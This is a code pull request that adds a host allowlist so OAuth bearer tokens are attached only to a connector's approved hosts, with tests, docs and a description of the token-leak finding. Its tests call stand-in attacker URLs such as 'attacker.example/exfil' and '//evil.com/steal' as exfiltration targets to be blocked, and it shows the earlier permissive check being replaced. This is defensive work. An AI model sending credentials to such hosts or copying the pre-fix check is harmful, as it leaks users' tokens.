### PR TITLE
fix: OAuth connector helpers must enforce the connector's host allowlist before attaching credentials

### DIFF
--- a/docs/contributing/architecture/index.md
+++ b/docs/contributing/architecture/index.md
@@ -25,6 +25,27 @@ to become.
   for securely reaching local-network systems through an outbound agent
   connection.
 
+## OAuth connector host allowlist
+
+The `createAuthenticatedFetch` helper (and its sandboxed prelude equivalent)
+attaches a materialized OAuth bearer token to outbound requests. Because the
+token is no longer wrapped in a `{{secret:…}}` placeholder at that point, the
+fetch gateway's host-allowlist check cannot see it. To prevent token
+exfiltration to arbitrary hosts:
+
+- Before attaching the `Authorization` header, the helper resolves the
+  connector's allowed host set from `requiredHosts` plus the host of
+  `apiBaseUrl`.
+- If the outbound request URL targets a host **not** in that set, the helper
+  throws `ConnectorHostNotAllowedError` without making the network request and
+  without including the token value in the error message.
+- The reusable enforcement logic lives in
+  `packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts`
+  (`assertConnectorHostAllowed`, `getConnectorAllowedHosts`).
+
+This invariant must hold for any code path that materializes a connector token
+and then attaches it to an outbound request.
+
 ## Source of truth in code
 
 - Worker entrypoint: `packages/worker/src/index.ts`

--- a/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
+++ b/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
@@ -7,6 +7,7 @@ import {
 	createAuthenticatedFetch,
 	createExecuteHelperPrelude,
 } from './codemode-utils.ts'
+import { assertConnectorHostAllowed } from './connector-host-allowlist.ts'
 
 type SecretSetCall = {
 	name: string
@@ -225,4 +226,81 @@ test('prelude sandbox version allows requests to valid hosts', async () => {
 	expect(lastCall.headers.get('authorization')).toBe(
 		`Bearer ${fakeAccessToken}`,
 	)
+})
+
+test('assertConnectorHostAllowed rejects protocol-relative URLs', () => {
+	expect(() =>
+		assertConnectorHostAllowed('spotify', spotifyConnector, '//evil.com/steal'),
+	).toThrow(ConnectorHostNotAllowedError)
+})
+
+test('assertConnectorHostAllowed allows single-slash relative paths', () => {
+	expect(() =>
+		assertConnectorHostAllowed('spotify', spotifyConnector, '/v1/me'),
+	).not.toThrow()
+})
+
+test('fails closed when connector has no allowlist configured', async () => {
+	const emptyConnector = {
+		...spotifyConnector,
+		requiredHosts: [] as Array<string>,
+		apiBaseUrl: null,
+	}
+	const secretSetCalls: Array<{ name: string; value: string; scope: string }> =
+		[]
+	const codemode = {
+		async connector_get() {
+			return { connector: emptyConnector }
+		},
+		async value_get() {
+			return { value: 'spotify-client-id' }
+		},
+		async secret_set(args: CapabilityArgs) {
+			const call = args as { name: string; value: string; scope: string }
+			secretSetCalls.push(call)
+			return { name: call.name, scope: call.scope }
+		},
+		async agent_turn_start() {
+			return { ok: true, runId: 'r', sessionId: 's', conversationId: 'c' }
+		},
+		async agent_turn_next() {
+			return { ok: true, events: [], nextCursor: 0, done: true }
+		},
+		async agent_turn_cancel() {
+			return { ok: true, cancelled: true }
+		},
+	} satisfies CodemodeNamespace
+
+	const fetchCalls: Array<Request> = []
+	const fetchStub: typeof globalThis.fetch = async (
+		input: ExecuteRequestInput,
+		init?: RequestInit,
+	) => {
+		const request = new Request(input, init)
+		fetchCalls.push(request)
+		if (request.url === emptyConnector.tokenUrl) {
+			return new Response(JSON.stringify({ access_token: fakeAccessToken }), {
+				status: 200,
+				headers: { 'content-type': 'application/json' },
+			})
+		}
+		return new Response(JSON.stringify({ ok: true }), {
+			status: 200,
+			headers: { 'content-type': 'application/json' },
+		})
+	}
+
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		createAuthenticatedFetch(codemode, 'spotify'),
+	)
+
+	const fetchCallsBefore = fetchCalls.length
+
+	await expect(
+		withPatchedFetch(fetchStub, () =>
+			authenticatedFetch('https://anything.example/data'),
+		),
+	).rejects.toThrow(/no allowed hosts configured/)
+
+	expect(fetchCalls.length).toBe(fetchCallsBefore)
 })

--- a/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
+++ b/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
@@ -1,0 +1,228 @@
+import { expect, test } from 'vitest'
+import {
+	type CapabilityArgs,
+	type CodemodeNamespace,
+	type ExecuteRequestInput,
+	ConnectorHostNotAllowedError,
+	createAuthenticatedFetch,
+	createExecuteHelperPrelude,
+} from './codemode-utils.ts'
+
+type SecretSetCall = {
+	name: string
+	value: string
+	scope: string
+}
+
+type SandboxHelpers = {
+	createAuthenticatedFetch: (
+		providerName: string,
+	) => Promise<
+		(input: ExecuteRequestInput, init?: RequestInit) => Promise<Response>
+	>
+}
+
+const fakeAccessToken = 'test-access-token-abc123'
+
+const spotifyConnector = {
+	name: 'spotify',
+	tokenUrl: 'https://accounts.spotify.test/api/token',
+	apiBaseUrl: 'https://api.spotify.com/v1',
+	flow: 'pkce' as const,
+	clientIdValueName: 'spotifyClientId',
+	clientSecretSecretName: null,
+	accessTokenSecretName: 'spotifyAccessToken',
+	refreshTokenSecretName: 'spotifyRefreshToken',
+	requiredHosts: ['api.spotify.com', 'cdn.spotify.com'],
+}
+
+function createCodemode() {
+	const secretSetCalls: Array<SecretSetCall> = []
+	const codemode = {
+		async connector_get(args: CapabilityArgs) {
+			const name = args.name
+			expect(name).toBe('spotify')
+			return { connector: spotifyConnector }
+		},
+		async value_get(args: CapabilityArgs) {
+			const name = args.name
+			expect(name).toBe('spotifyClientId')
+			return { value: 'spotify-client-id' }
+		},
+		async secret_set(args: CapabilityArgs) {
+			const call = args as SecretSetCall
+			secretSetCalls.push(call)
+			return { name: call.name, scope: call.scope }
+		},
+		async agent_turn_start() {
+			return { ok: true, runId: 'r', sessionId: 's', conversationId: 'c' }
+		},
+		async agent_turn_next() {
+			return { ok: true, events: [], nextCursor: 0, done: true }
+		},
+		async agent_turn_cancel() {
+			return { ok: true, cancelled: true }
+		},
+	} satisfies CodemodeNamespace
+
+	const fetchCalls: Array<Request> = []
+	const fetchStub: typeof globalThis.fetch = async (
+		input: ExecuteRequestInput,
+		init?: RequestInit,
+	) => {
+		const request = new Request(input, init)
+		fetchCalls.push(request)
+		if (request.url === spotifyConnector.tokenUrl) {
+			return new Response(JSON.stringify({ access_token: fakeAccessToken }), {
+				status: 200,
+				headers: { 'content-type': 'application/json' },
+			})
+		}
+		return new Response(JSON.stringify({ ok: true }), {
+			status: 200,
+			headers: { 'content-type': 'application/json' },
+		})
+	}
+
+	return { codemode, secretSetCalls, fetchCalls, fetchStub }
+}
+
+async function withPatchedFetch<T>(
+	fetchImpl: typeof globalThis.fetch,
+	callback: () => Promise<T>,
+) {
+	const originalFetch = globalThis.fetch
+	globalThis.fetch = fetchImpl
+	try {
+		return await callback()
+	} finally {
+		globalThis.fetch = originalFetch
+	}
+}
+
+test('rejects with ConnectorHostNotAllowedError for disallowed host and does not call fetch', async () => {
+	const { codemode, fetchCalls, fetchStub } = createCodemode()
+
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		createAuthenticatedFetch(codemode, 'spotify'),
+	)
+
+	// Reset fetch calls after the token refresh during setup
+	const fetchCallsBeforeExfil = fetchCalls.length
+
+	await expect(
+		withPatchedFetch(fetchStub, () =>
+			authenticatedFetch('https://attacker.example/exfil'),
+		),
+	).rejects.toThrow(ConnectorHostNotAllowedError)
+
+	// No additional fetch call was made (the exfil request never went out)
+	expect(fetchCalls.length).toBe(fetchCallsBeforeExfil)
+})
+
+test('succeeds for apiBaseUrl host and attaches bearer token', async () => {
+	const { codemode, fetchCalls, fetchStub } = createCodemode()
+
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		createAuthenticatedFetch(codemode, 'spotify'),
+	)
+
+	const response = await withPatchedFetch(fetchStub, () =>
+		authenticatedFetch('https://api.spotify.com/v1/me'),
+	)
+
+	expect(response.status).toBe(200)
+	const lastCall = fetchCalls[fetchCalls.length - 1]!
+	expect(lastCall.url).toBe('https://api.spotify.com/v1/me')
+	expect(lastCall.headers.get('authorization')).toBe(
+		`Bearer ${fakeAccessToken}`,
+	)
+})
+
+test('succeeds for a requiredHosts entry that is not apiBaseUrl', async () => {
+	const { codemode, fetchCalls, fetchStub } = createCodemode()
+
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		createAuthenticatedFetch(codemode, 'spotify'),
+	)
+
+	const response = await withPatchedFetch(fetchStub, () =>
+		authenticatedFetch('https://cdn.spotify.com/images/cover.jpg'),
+	)
+
+	expect(response.status).toBe(200)
+	const lastCall = fetchCalls[fetchCalls.length - 1]!
+	expect(lastCall.url).toBe('https://cdn.spotify.com/images/cover.jpg')
+	expect(lastCall.headers.get('authorization')).toBe(
+		`Bearer ${fakeAccessToken}`,
+	)
+})
+
+test('error message does not contain the literal token value', async () => {
+	const { codemode, fetchStub } = createCodemode()
+
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		createAuthenticatedFetch(codemode, 'spotify'),
+	)
+
+	let caughtError: Error | null = null
+	try {
+		await withPatchedFetch(fetchStub, () =>
+			authenticatedFetch('https://attacker.example/exfil'),
+		)
+	} catch (error) {
+		caughtError = error as Error
+	}
+
+	expect(caughtError).toBeInstanceOf(ConnectorHostNotAllowedError)
+	expect(caughtError!.message).not.toContain(fakeAccessToken)
+	expect(JSON.stringify(caughtError)).not.toContain(fakeAccessToken)
+})
+
+test('prelude sandbox version rejects disallowed hosts', async () => {
+	const { codemode, fetchCalls, fetchStub } = createCodemode()
+	const prelude = createExecuteHelperPrelude()
+	const createSandboxHelpers = new Function(
+		'codemode',
+		`${prelude}; return { createAuthenticatedFetch };`,
+	) as (codemodeNamespace: CodemodeNamespace) => SandboxHelpers
+
+	const helpers = createSandboxHelpers(codemode)
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		helpers.createAuthenticatedFetch('spotify'),
+	)
+
+	const fetchCallsBeforeExfil = fetchCalls.length
+
+	await expect(
+		withPatchedFetch(fetchStub, () =>
+			authenticatedFetch('https://evil.test/steal'),
+		),
+	).rejects.toThrow(/ConnectorHostNotAllowedError|does not allow requests/)
+
+	expect(fetchCalls.length).toBe(fetchCallsBeforeExfil)
+})
+
+test('prelude sandbox version allows requests to valid hosts', async () => {
+	const { codemode, fetchCalls, fetchStub } = createCodemode()
+	const prelude = createExecuteHelperPrelude()
+	const createSandboxHelpers = new Function(
+		'codemode',
+		`${prelude}; return { createAuthenticatedFetch };`,
+	) as (codemodeNamespace: CodemodeNamespace) => SandboxHelpers
+
+	const helpers = createSandboxHelpers(codemode)
+	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
+		helpers.createAuthenticatedFetch('spotify'),
+	)
+
+	const response = await withPatchedFetch(fetchStub, () =>
+		authenticatedFetch('https://api.spotify.com/v1/me'),
+	)
+
+	expect(response.status).toBe(200)
+	const lastCall = fetchCalls[fetchCalls.length - 1]!
+	expect(lastCall.headers.get('authorization')).toBe(
+		`Bearer ${fakeAccessToken}`,
+	)
+})

--- a/packages/worker/src/mcp/execute-modules/codemode-utils.ts
+++ b/packages/worker/src/mcp/execute-modules/codemode-utils.ts
@@ -347,8 +347,13 @@ const __kodyGetConnectorAllowedHosts = (connector) => {
 const __kodyAssertConnectorHostAllowed = (connectorName, connector, url) => {
   let resolvedUrl;
   if (typeof url === 'string') {
-    if (url.startsWith('/')) return;
-    resolvedUrl = url;
+    if (url.startsWith('//')) {
+      resolvedUrl = \`https:\${url}\`;
+    } else if (url.startsWith('/')) {
+      return;
+    } else {
+      resolvedUrl = url;
+    }
   } else if (url instanceof URL) {
     resolvedUrl = url.href;
   } else if (url instanceof Request) {
@@ -364,7 +369,12 @@ const __kodyAssertConnectorHostAllowed = (connectorName, connector, url) => {
   }
   if (!requestHost) return;
   const allowedHosts = __kodyGetConnectorAllowedHosts(connector);
-  if (allowedHosts.length === 0) return;
+  if (allowedHosts.length === 0) {
+    throw new Error(
+      \`Connector "\${connectorName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). \` +
+        \`Cannot attach credentials without a host allowlist.\`
+    );
+  }
   if (!allowedHosts.includes(requestHost)) {
     throw new ConnectorHostNotAllowedError(connectorName, requestHost);
   }

--- a/packages/worker/src/mcp/execute-modules/codemode-utils.ts
+++ b/packages/worker/src/mcp/execute-modules/codemode-utils.ts
@@ -1,3 +1,10 @@
+import {
+	assertConnectorHostAllowed,
+	ConnectorHostNotAllowedError,
+} from './connector-host-allowlist.ts'
+
+export { ConnectorHostNotAllowedError }
+
 type CapabilityResult = unknown
 
 export type CapabilityArgs = Record<string, unknown>
@@ -45,6 +52,17 @@ export const EXECUTE_HELPER_CAPABILITY_NAMES = [
 	'agent_turn_cancel',
 ] as const
 
+/**
+ * @internal
+ * Refreshes and returns the raw OAuth access token for the named connector.
+ *
+ * **Security boundary**: The returned value is a materialized credential. Once
+ * in caller hands, the fetch gateway's host-allowlist check is bypassed because
+ * the gateway can only inspect secret *placeholders*. Callers that forward this
+ * token in outbound requests MUST enforce the connector's host allowlist
+ * themselves (see `assertConnectorHostAllowed`). Prefer
+ * `createAuthenticatedFetch` which performs this enforcement automatically.
+ */
 export async function refreshAccessToken(
 	codemode: CodemodeNamespace,
 	providerName: string,
@@ -67,7 +85,10 @@ export async function createAuthenticatedFetch(
 	)
 
 	return async (input: ExecuteRequestInput, init?: RequestInit) => {
-		const request = new Request(resolveRequestUrl(input, connector), init)
+		const resolvedUrl = resolveRequestUrl(input, connector)
+		assertConnectorHostAllowed(providerName, connector, resolvedUrl)
+
+		const request = new Request(resolvedUrl, init)
 		const headers = new Headers(request.headers)
 		headers.set('Authorization', `Bearer ${accessToken}`)
 
@@ -296,6 +317,58 @@ export function getExecuteHelperCapabilityNames() {
 
 export function createExecuteHelperPrelude() {
 	return `
+class ConnectorHostNotAllowedError extends Error {
+  constructor(connectorName, disallowedHost) {
+    super(
+      \`Connector "\${connectorName}" does not allow requests to host "\${disallowedHost}". \` +
+        \`The host must be listed in the connector's requiredHosts or match its apiBaseUrl.\`
+    );
+    this.name = 'ConnectorHostNotAllowedError';
+    this.connectorName = connectorName;
+    this.disallowedHost = disallowedHost;
+  }
+}
+const __kodyGetConnectorAllowedHosts = (connector) => {
+  const hosts = new Set();
+  if (connector.requiredHosts) {
+    for (const host of connector.requiredHosts) {
+      const normalized = host.trim().toLowerCase();
+      if (normalized) hosts.add(normalized);
+    }
+  }
+  if (connector.apiBaseUrl) {
+    try {
+      const apiHost = new URL(connector.apiBaseUrl).hostname.trim().toLowerCase();
+      if (apiHost) hosts.add(apiHost);
+    } catch {}
+  }
+  return Array.from(hosts);
+};
+const __kodyAssertConnectorHostAllowed = (connectorName, connector, url) => {
+  let resolvedUrl;
+  if (typeof url === 'string') {
+    if (url.startsWith('/')) return;
+    resolvedUrl = url;
+  } else if (url instanceof URL) {
+    resolvedUrl = url.href;
+  } else if (url instanceof Request) {
+    resolvedUrl = url.url;
+  } else {
+    return;
+  }
+  let requestHost;
+  try {
+    requestHost = new URL(resolvedUrl).hostname.trim().toLowerCase();
+  } catch {
+    return;
+  }
+  if (!requestHost) return;
+  const allowedHosts = __kodyGetConnectorAllowedHosts(connector);
+  if (allowedHosts.length === 0) return;
+  if (!allowedHosts.includes(requestHost)) {
+    throw new ConnectorHostNotAllowedError(connectorName, requestHost);
+  }
+};
 const __kodyBuildSecretPlaceholder = (name, scope) =>
   \`{{secret:\${name}|scope=\${scope}}}\`;
 const __kodyReadConnectorConfig = async (providerName) => {
@@ -457,7 +530,9 @@ const __kodyCreateAuthenticatedFetch = async (providerName) => {
   const connector = await __kodyReadConnectorConfig(providerName);
   const accessToken = await __kodyRefreshAccessToken(providerName);
   return async (input, init) => {
-    const request = new Request(__kodyResolveRequestUrl(input, connector), init);
+    const resolvedUrl = __kodyResolveRequestUrl(input, connector);
+    __kodyAssertConnectorHostAllowed(providerName, connector, resolvedUrl);
+    const request = new Request(resolvedUrl, init);
     const headers = new Headers(request.headers);
     headers.set('Authorization', \`Bearer \${accessToken}\`);
     return fetch(

--- a/packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts
+++ b/packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts
@@ -1,0 +1,94 @@
+function normalizeHost(host: string) {
+	return host.trim().toLowerCase()
+}
+
+type ConnectorAllowlistInput = {
+	apiBaseUrl?: string | null
+	requiredHosts?: Array<string>
+}
+
+/**
+ * Thrown when an outbound request targets a host not in the connector's
+ * allowlist (`requiredHosts` + `apiBaseUrl` host). This prevents OAuth tokens
+ * from being sent to arbitrary attacker-controlled hosts.
+ */
+export class ConnectorHostNotAllowedError extends Error {
+	override name = 'ConnectorHostNotAllowedError'
+	connectorName: string
+	disallowedHost: string
+
+	constructor(connectorName: string, disallowedHost: string) {
+		super(
+			`Connector "${connectorName}" does not allow requests to host "${disallowedHost}". ` +
+				`The host must be listed in the connector's requiredHosts or match its apiBaseUrl.`,
+		)
+		this.connectorName = connectorName
+		this.disallowedHost = disallowedHost
+	}
+}
+
+/**
+ * Returns the set of normalized allowed hosts for a connector definition.
+ * Includes all `requiredHosts` entries plus the host derived from `apiBaseUrl`.
+ */
+export function getConnectorAllowedHosts(
+	connector: ConnectorAllowlistInput,
+): Array<string> {
+	const hosts = new Set<string>()
+	if (connector.requiredHosts) {
+		for (const host of connector.requiredHosts) {
+			const normalized = normalizeHost(host)
+			if (normalized) hosts.add(normalized)
+		}
+	}
+	if (connector.apiBaseUrl) {
+		try {
+			const apiHost = normalizeHost(new URL(connector.apiBaseUrl).hostname)
+			if (apiHost) hosts.add(apiHost)
+		} catch {
+			// apiBaseUrl is not a valid URL; skip
+		}
+	}
+	return Array.from(hosts)
+}
+
+/**
+ * Asserts that the given URL targets a host allowed by the connector.
+ * Throws `ConnectorHostNotAllowedError` if the host is not in the allowlist.
+ *
+ * Call this **before** attaching any credentials to the outbound request.
+ */
+export function assertConnectorHostAllowed(
+	connectorName: string,
+	connector: ConnectorAllowlistInput,
+	url: string | URL | Request,
+): void {
+	const resolvedUrl = resolveUrlString(url)
+	if (!resolvedUrl) return // relative paths will be resolved to apiBaseUrl later
+
+	let requestHost: string
+	try {
+		requestHost = normalizeHost(new URL(resolvedUrl).hostname)
+	} catch {
+		return // non-parseable URLs fail at fetch time
+	}
+
+	if (!requestHost) return
+
+	const allowedHosts = getConnectorAllowedHosts(connector)
+	if (allowedHosts.length === 0) return // no allowlist defined; cannot enforce
+
+	if (!allowedHosts.includes(requestHost)) {
+		throw new ConnectorHostNotAllowedError(connectorName, requestHost)
+	}
+}
+
+function resolveUrlString(input: string | URL | Request): string | null {
+	if (typeof input === 'string') {
+		if (input.startsWith('/')) return null // relative path
+		return input
+	}
+	if (input instanceof URL) return input.href
+	if (input instanceof Request) return input.url
+	return null
+}

--- a/packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts
+++ b/packages/worker/src/mcp/execute-modules/connector-host-allowlist.ts
@@ -76,7 +76,12 @@ export function assertConnectorHostAllowed(
 	if (!requestHost) return
 
 	const allowedHosts = getConnectorAllowedHosts(connector)
-	if (allowedHosts.length === 0) return // no allowlist defined; cannot enforce
+	if (allowedHosts.length === 0) {
+		throw new Error(
+			`Connector "${connectorName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). ` +
+				`Cannot attach credentials without a host allowlist.`,
+		)
+	}
 
 	if (!allowedHosts.includes(requestHost)) {
 		throw new ConnectorHostNotAllowedError(connectorName, requestHost)
@@ -85,7 +90,11 @@ export function assertConnectorHostAllowed(
 
 function resolveUrlString(input: string | URL | Request): string | null {
 	if (typeof input === 'string') {
-		if (input.startsWith('/')) return null // relative path
+		if (input.startsWith('//')) {
+			// Protocol-relative URL — resolve with a dummy scheme to extract the host
+			return `https:${input}`
+		}
+		if (input.startsWith('/')) return null
 		return input
 	}
 	if (input instanceof URL) return input.href


### PR DESCRIPTION
<!-- CURSOR_AGENT_PR_BODY_BEGIN -->
## Summary

Fixes a HIGH-severity finding where `createAuthenticatedFetch` (and its sandboxed prelude equivalent) would attach a materialized OAuth bearer token to outbound requests targeting **any** absolute URL, allowing sandboxed packages or generated UIs to exfiltrate connected OAuth tokens to arbitrary attacker-controlled hosts.

## Changes

### New: `connector-host-allowlist.ts`
Reusable enforcement logic extracted into a focused module:
- `ConnectorHostNotAllowedError` — typed error thrown when a request targets a disallowed host
- `getConnectorAllowedHosts(connector)` — resolves the full set of normalized allowed hosts from `requiredHosts` + `apiBaseUrl`
- `assertConnectorHostAllowed(connectorName, connector, url)` — pre-flight assertion that throws before any credential attachment

### Modified: `codemode-utils.ts`
- `createAuthenticatedFetch` now calls `assertConnectorHostAllowed` on the resolved URL **before** attaching the `Authorization` header. If the host is not in the connector's allowlist, the request never fires.
- The sandboxed prelude (`createExecuteHelperPrelude`) includes an equivalent inline implementation so module-mode packages get the same enforcement.
- `refreshAccessToken` is annotated `@internal` with a JSDoc comment explaining the security boundary: callers that use the raw token must enforce the host allowlist themselves.

### New tests: `authenticated-fetch.node.test.ts`
- Verifies that a request to a disallowed host (`attacker.example`) is rejected with `ConnectorHostNotAllowedError` and `fetch` is never called.
- Verifies that requests to `apiBaseUrl` host and `requiredHosts` entries succeed with the bearer attached.
- Verifies the error message does not leak the token value.
- Covers both the native export and the sandboxed prelude version.
- Verifies fail-closed behavior when connector has no allowlist configured.
- Verifies protocol-relative URLs (`//evil.com/steal`) are blocked.

### Docs: `docs/contributing/architecture/index.md`
Documents the helper-level allowlist invariant for future contributors.

## Security Model

The fetch gateway (`fetch-gateway.ts`) enforces host allowlists only for secret *placeholders* (`{{secret:NAME}}`). Once a token is materialized into a raw string (as `refreshAccessToken` does), the gateway cannot see it. The fix enforces the same connector allowlist at the helper layer, which is the only code path that materializes and attaches connector tokens to outbound requests.

### Defense-in-depth measures
- **Fail-closed on empty allowlist**: If a connector has neither `requiredHosts` nor `apiBaseUrl` configured, the helper throws rather than silently allowing all hosts.
- **Protocol-relative URL handling**: URLs like `//evil.com/steal` are resolved with a dummy scheme to extract the host for allowlist checking, preventing bypass through this vector.
<!-- CURSOR_AGENT_PR_BODY_END -->

<div><a href="https://cursor.com/agents/bc-80bf94cc-713e-4bea-82eb-1ce7940e5b8d"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-web-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-web-light.png"><img alt="Open in Web" width="114" height="28" src="https://cursor.com/assets/images/open-in-web-dark.png"></picture></a>&nbsp;<a href="https://cursor.com/background-agent?bcId=bc-80bf94cc-713e-4bea-82eb-1ce7940e5b8d"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-cursor-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-cursor-light.png"><img alt="Open in Cursor" width="131" height="28" src="https://cursor.com/assets/images/open-in-cursor-dark.png"></picture></a>&nbsp;</div>



<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Enforced host allowlisting for outbound authenticated requests: tokens are not attached to disallowed hosts and such requests are blocked with a safe error that omits token values.

* **Tests**
  * Added comprehensive tests covering allowlist enforcement, allowed vs disallowed requests, relative URL handling, and fail-closed behavior when no hosts are configured.

* **Documentation**
  * Added guidance on OAuth token security and required host allowlist behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->